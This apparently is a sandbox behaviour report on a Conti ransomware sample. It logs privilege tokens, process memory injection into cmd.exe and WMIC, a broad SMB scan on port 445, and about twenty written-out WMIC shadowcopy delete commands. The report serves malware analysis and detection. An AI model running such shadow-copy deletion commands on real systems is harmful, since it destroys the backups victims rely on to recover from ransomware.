Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: 33	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: 34	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: 35	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: 33	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: 34	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: 35	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 536 wrote to memory of 2676	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 2676	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 2676	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 2676	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 2676 wrote to memory of 2824	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 2676 wrote to memory of 2824	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 2676 wrote to memory of 2824	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 536 wrote to memory of 2844	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 2844	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 2844	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 2844	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 2708	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 2844 wrote to memory of 2708	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 2844 wrote to memory of 2708	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 536 wrote to memory of 2556	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 2556	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 2556	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 2556	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 2556 wrote to memory of 2608	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 2556 wrote to memory of 2608	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 2556 wrote to memory of 2608	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 536 wrote to memory of 2592	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 2592	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 2592	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 2592	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 2592 wrote to memory of 2972	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 2592 wrote to memory of 2972	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 2592 wrote to memory of 2972	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 536 wrote to memory of 1800	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 1800	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 1800	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 1800	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 1800 wrote to memory of 352	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 1800 wrote to memory of 352	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 1800 wrote to memory of 352	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 536 wrote to memory of 592	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 592	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 592	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 592	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 2040	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 592 wrote to memory of 2040	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 592 wrote to memory of 2040	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 536 wrote to memory of 1916	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 1916	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 1916	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 1916	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 1916 wrote to memory of 1696	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 1916 wrote to memory of 1696	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 1916 wrote to memory of 1696	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 536 wrote to memory of 580	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 580	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 580	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 580	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 580 wrote to memory of 1040	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 580 wrote to memory of 1040	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 580 wrote to memory of 1040	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 536 wrote to memory of 2020	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 2020	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 2020	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 536 wrote to memory of 2020	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe
PID 2020 wrote to memory of 1044	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 2020 wrote to memory of 1044	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 2020 wrote to memory of 1044	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 536 wrote to memory of 1296	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\system32\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{74D38716-7030-4BFD-B927-115ECEA7C372}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{74D38716-7030-4BFD-B927-115ECEA7C372}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{1B5750AE-3D19-4A1D-917C-FD657FD87F33}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{1B5750AE-3D19-4A1D-917C-FD657FD87F33}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{63CC0077-C804-4837-84F2-5617DF29F4F7}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{63CC0077-C804-4837-84F2-5617DF29F4F7}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{0EE84E8E-9CE9-4DE2-A7DD-EBBC3C42E703}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{0EE84E8E-9CE9-4DE2-A7DD-EBBC3C42E703}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CD71E7E4-9980-4112-82CF-3554C09685EB}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CD71E7E4-9980-4112-82CF-3554C09685EB}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{7459311B-7CF8-41C9-9F6B-56B19AD27291}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{7459311B-7CF8-41C9-9F6B-56B19AD27291}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{8428BEA3-796B-41E7-8FDE-FF3F7A14B79E}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{8428BEA3-796B-41E7-8FDE-FF3F7A14B79E}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{210E0F43-9FB8-40B5-9090-EC0EAC92CC6A}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{210E0F43-9FB8-40B5-9090-EC0EAC92CC6A}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{F1E34A01-7A72-421C-9E4D-5DA5706A8784}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{F1E34A01-7A72-421C-9E4D-5DA5706A8784}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{411231A5-4F54-4EE8-9679-AE46EFF66DCA}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{411231A5-4F54-4EE8-9679-AE46EFF66DCA}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{427F6911-4199-4894-9064-F24F0B79AB41}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{427F6911-4199-4894-9064-F24F0B79AB41}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{44535E90-C0F6-469D-B4BA-C34D5B335C90}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{44535E90-C0F6-469D-B4BA-C34D5B335C90}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{7C225D06-D687-440D-8F1B-4D756E128942}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{7C225D06-D687-440D-8F1B-4D756E128942}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B29E708E-242E-4A8C-9368-655124940DC4}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B29E708E-242E-4A8C-9368-655124940DC4}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{082411FE-9F57-42CA-A9FB-BB28AB90A0A4}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{082411FE-9F57-42CA-A9FB-BB28AB90A0A4}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{668B7956-B389-4B75-A59B-9171186F15AB}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{668B7956-B389-4B75-A59B-9171186F15AB}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{A78157EC-FD2A-4CD1-B0BD-E828E80FEF0D}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{A78157EC-FD2A-4CD1-B0BD-E828E80FEF0D}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{4D1AD3DF-B27F-4B97-B1B1-35F98CCEA001}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{4D1AD3DF-B27F-4B97-B1B1-35F98CCEA001}'" delete

Network

Country	Destination	Domain	Proto
N/A	10.127.0.1:445		tcp
N/A	10.127.0.41:445		tcp
N/A	10.127.0.10:445		tcp
N/A	10.127.0.37:445		tcp
N/A	10.127.0.6:445		tcp
N/A	10.127.0.9:445		tcp
N/A	10.127.0.16:445		tcp
N/A	10.127.0.39:445		tcp
N/A	10.127.0.8:445		tcp
N/A	10.127.0.165:445		tcp
N/A	10.127.0.21:445		tcp
N/A	10.127.0.23:445		tcp
N/A	10.127.0.18:445		tcp
N/A	10.127.0.32:445		tcp
N/A	10.127.0.47:445		tcp
N/A	10.127.0.3:445		tcp
N/A	10.127.0.29:445		tcp
N/A	10.127.0.2:445		tcp
N/A	10.127.0.30:445		tcp
N/A	10.127.0.43:445		tcp
N/A	10.127.0.51:445		tcp
N/A	10.127.0.45:445		tcp
N/A	10.127.0.25:445		tcp
N/A	10.127.0.0:445		tcp
N/A	10.127.0.19:445		tcp
N/A	10.127.0.22:445		tcp
N/A	10.127.0.35:445		tcp
N/A	10.127.0.46:445		tcp
N/A	10.127.0.57:445		tcp
N/A	10.127.0.65:445		tcp
N/A	10.127.0.63:445		tcp
N/A	10.127.0.44:445		tcp
N/A	10.127.0.54:445		tcp
N/A	10.127.0.27:445		tcp
N/A	10.127.0.52:445		tcp
N/A	10.127.0.34:445		tcp
N/A	10.127.0.13:445		tcp
N/A	10.127.0.33:445		tcp
N/A	10.127.0.17:445		tcp
N/A	10.127.0.48:445		tcp
N/A	10.127.0.53:445		tcp
N/A	10.127.0.4:445		tcp
N/A	10.127.0.12:445		tcp
N/A	10.127.0.66:445		tcp
N/A	10.127.0.59:445		tcp
N/A	10.127.0.5:445		tcp
N/A	10.127.0.58:445		tcp
N/A	10.127.0.61:445		tcp
N/A	10.127.0.75:445		tcp
N/A	10.127.0.15:445		tcp
N/A	10.127.0.49:445		tcp
N/A	10.127.0.14:445		tcp
N/A	10.127.0.87:445		tcp
N/A	10.127.0.28:445		tcp
N/A	10.127.0.31:445		tcp
N/A	10.127.0.50:445		tcp
N/A	10.127.0.64:445		tcp
N/A	10.127.0.55:445		tcp
N/A	10.127.0.38:445		tcp
N/A	10.127.0.56:445		tcp
N/A	10.127.0.62:445		tcp
N/A	10.127.0.40:445		tcp
N/A	10.127.0.26:445		tcp
N/A	10.127.0.36:445		tcp
N/A	10.127.0.77:445		tcp
N/A	10.127.0.24:445		tcp
N/A	10.127.0.42:445		tcp
N/A	10.127.0.80:445		tcp
N/A	10.127.0.119:445		tcp
N/A	10.127.0.7:445		tcp
N/A	10.127.0.20:445		tcp
N/A	10.127.0.82:445		tcp
N/A	10.127.0.11:445		tcp
N/A	10.127.0.76:445		tcp
N/A	10.127.0.120:445		tcp
N/A	10.127.0.121:445		tcp
N/A	10.127.0.73:445		tcp
N/A	10.127.0.84:445		tcp
N/A	10.127.0.79:445		tcp
N/A	10.127.0.69:445		tcp
N/A	10.127.0.86:445		tcp
N/A	10.127.0.85:445		tcp
N/A	10.127.0.67:445		tcp
N/A	10.127.0.72:445		tcp
N/A	10.127.0.83:445		tcp
N/A	10.127.0.70:445		tcp
N/A	10.127.0.78:445		tcp
N/A	10.127.0.71:445		tcp
N/A	10.127.0.81:445		tcp
N/A	10.127.0.88:445		tcp
N/A	10.127.0.74:445		tcp
N/A	10.127.0.68:445		tcp
N/A	10.127.0.103:445		tcp
N/A	10.127.0.111:445		tcp
N/A	10.127.0.115:445		tcp
N/A	10.127.0.91:445		tcp
N/A	10.127.0.101:445		tcp
N/A	10.127.0.104:445		tcp
N/A	10.127.0.123:445		tcp
N/A	10.127.0.116:445		tcp
N/A	10.127.0.89:445		tcp
N/A	10.127.0.156:445		tcp
N/A	10.127.0.90:445		tcp
N/A	10.127.0.105:445		tcp
N/A	10.127.0.153:445		tcp
N/A	10.127.0.137:445		tcp
N/A	10.127.0.93:445		tcp
N/A	10.127.0.94:445		tcp
N/A	10.127.0.126:445		tcp
N/A	10.127.0.142:445		tcp
N/A	10.127.0.151:445		tcp
N/A	10.127.0.127:445		tcp
N/A	10.127.0.138:445		tcp
N/A	10.127.0.150:445		tcp
N/A	10.127.0.145:445		tcp
N/A	10.127.0.95:445		tcp
N/A	10.127.0.107:445		tcp
N/A	10.127.0.99:445		tcp
N/A	10.127.0.108:445		tcp
N/A	10.127.0.154:445		tcp
N/A	10.127.0.110:445		tcp
N/A	10.127.0.97:445		tcp
N/A	10.127.0.133:445		tcp
N/A	10.127.0.146:445		tcp
N/A	10.127.0.125:445		tcp
N/A	10.127.0.136:445		tcp
N/A	10.127.0.135:445		tcp
N/A	10.127.0.114:445		tcp
N/A	10.127.0.129:445		tcp
N/A	10.127.0.134:445		tcp
N/A	10.127.0.109:445		tcp
N/A	10.127.0.122:445		tcp
N/A	10.127.0.117:445		tcp
N/A	10.127.0.149:445		tcp
N/A	10.127.0.132:445		tcp
N/A	10.127.0.141:445		tcp
N/A	10.127.0.92:445		tcp
N/A	10.127.0.147:445		tcp
N/A	10.127.0.100:445		tcp
N/A	10.127.0.139:445		tcp
N/A	10.127.0.96:445		tcp
N/A	10.127.0.128:445		tcp
N/A	10.127.0.143:445		tcp
N/A	10.127.0.152:445		tcp
N/A	10.127.0.144:445		tcp
N/A	10.127.0.118:445		tcp
N/A	10.127.0.106:445		tcp
N/A	10.127.0.140:445		tcp
N/A	10.127.0.113:445		tcp
N/A	10.127.0.112:445		tcp
N/A	10.127.0.130:445		tcp
N/A	10.127.0.155:445		tcp
N/A	10.127.0.148:445		tcp
N/A	10.127.0.124:445		tcp
N/A	10.127.0.102:445		tcp
N/A	10.127.0.98:445		tcp
N/A	10.127.0.131:445		tcp
N/A	10.127.0.209:445		tcp
N/A	10.127.0.182:445		tcp
N/A	10.127.0.185:445		tcp
N/A	10.127.0.181:445		tcp
N/A	10.127.0.213:445		tcp
N/A	10.127.0.184:445		tcp
N/A	10.127.0.248:445		tcp
N/A	10.127.0.201:445		tcp
N/A	10.127.0.211:445		tcp
N/A	10.127.0.227:445		tcp
N/A	10.127.0.160:445		tcp
N/A	10.127.0.218:445		tcp
N/A	10.127.0.162:445		tcp
N/A	10.127.0.254:445		tcp
N/A	10.127.0.169:445		tcp
N/A	10.127.0.183:445		tcp
N/A	10.127.0.233:445		tcp
N/A	10.127.0.247:445		tcp
N/A	10.127.0.174:445		tcp
N/A	10.127.0.161:445		tcp
N/A	10.127.0.180:445		tcp
N/A	10.127.0.166:445		tcp
N/A	10.127.0.212:445		tcp
N/A	10.127.0.190:445		tcp
N/A	10.127.0.191:445		tcp
N/A	10.127.0.200:445		tcp
N/A	10.127.0.226:445		tcp
N/A	10.127.0.167:445		tcp
N/A	10.127.0.158:445		tcp
N/A	10.127.0.239:445		tcp
N/A	10.127.0.159:445		tcp
N/A	10.127.0.197:445		tcp
N/A	10.127.0.196:445		tcp
N/A	10.127.0.194:445		tcp
N/A	10.127.0.246:445		tcp
N/A	10.127.0.199:445		tcp
N/A	10.127.0.60:445		tcp
N/A	10.127.0.157:445		tcp
N/A	10.127.0.163:445		tcp
N/A	10.127.0.164:445		tcp
N/A	10.127.0.168:445		tcp
N/A	10.127.0.170:445		tcp
N/A	10.127.0.171:445		tcp
N/A	10.127.0.172:445		tcp
N/A	10.127.0.173:445		tcp
N/A	10.127.0.175:445		tcp
N/A	10.127.0.176:445		tcp
N/A	10.127.0.177:445		tcp
N/A	10.127.0.178:445		tcp
N/A	10.127.0.179:445		tcp
N/A	10.127.0.186:445		tcp
N/A	10.127.0.187:445		tcp
N/A	10.127.0.188:445		tcp
N/A	10.127.0.189:445		tcp
N/A	10.127.0.192:445		tcp
N/A	10.127.0.193:445		tcp
N/A	10.127.0.195:445		tcp
N/A	10.127.0.198:445		tcp
N/A	10.127.0.202:445		tcp
N/A	10.127.0.203:445		tcp
N/A	10.127.0.204:445		tcp
N/A	10.127.0.205:445		tcp
N/A	10.127.0.206:445		tcp
N/A	10.127.0.207:445		tcp
N/A	10.127.0.208:445		tcp
N/A	10.127.0.210:445		tcp
N/A	10.127.0.214:445		tcp
N/A	10.127.0.215:445		tcp
N/A	10.127.0.216:445		tcp
N/A	10.127.0.217:445		tcp
N/A	10.127.0.219:445		tcp
N/A	10.127.0.220:445		tcp
N/A	10.127.0.221:445		tcp
N/A	10.127.0.222:445		tcp
N/A	10.127.0.223:445		tcp
N/A	10.127.0.224:445		tcp
N/A	10.127.0.225:445		tcp
N/A	10.127.0.228:445		tcp
N/A	10.127.0.229:445		tcp
N/A	10.127.0.230:445		tcp
N/A	10.127.0.231:445		tcp
N/A	10.127.0.232:445		tcp
N/A	10.127.0.234:445		tcp
N/A	10.127.0.235:445		tcp
N/A	10.127.0.236:445		tcp
N/A	10.127.0.237:445		tcp
N/A	10.127.0.238:445		tcp
N/A	10.127.0.240:445		tcp
N/A	10.127.0.241:445		tcp
N/A	10.127.0.242:445		tcp
N/A	10.127.0.243:445		tcp
N/A	10.127.0.244:445		tcp
N/A	10.127.0.245:445		tcp
N/A	10.127.0.249:445		tcp
N/A	10.127.0.250:445		tcp
N/A	10.127.0.251:445		tcp
N/A	10.127.0.252:445		tcp
N/A	10.127.0.253:445		tcp
N/A	10.127.255.11:445		tcp
N/A	10.127.255.38:445		tcp
N/A	10.127.255.52:445		tcp
N/A	10.127.255.15:445		tcp
N/A	10.127.255.10:445		tcp
N/A	10.127.255.20:445		tcp
N/A	10.127.255.30:445		tcp
N/A	10.127.255.48:445		tcp
N/A	10.127.255.39:445		tcp
N/A	10.127.255.49:445		tcp
N/A	10.127.255.66:445		tcp
N/A	10.127.255.27:445		tcp
N/A	10.127.255.58:445		tcp
N/A	10.127.255.4:445		tcp
N/A	10.127.255.35:445		tcp
N/A	10.127.255.50:445		tcp
N/A	10.127.255.62:445		tcp
N/A	10.127.255.54:445		tcp
N/A	10.127.255.65:445		tcp
N/A	10.127.255.46:445		tcp
N/A	10.127.255.55:445		tcp
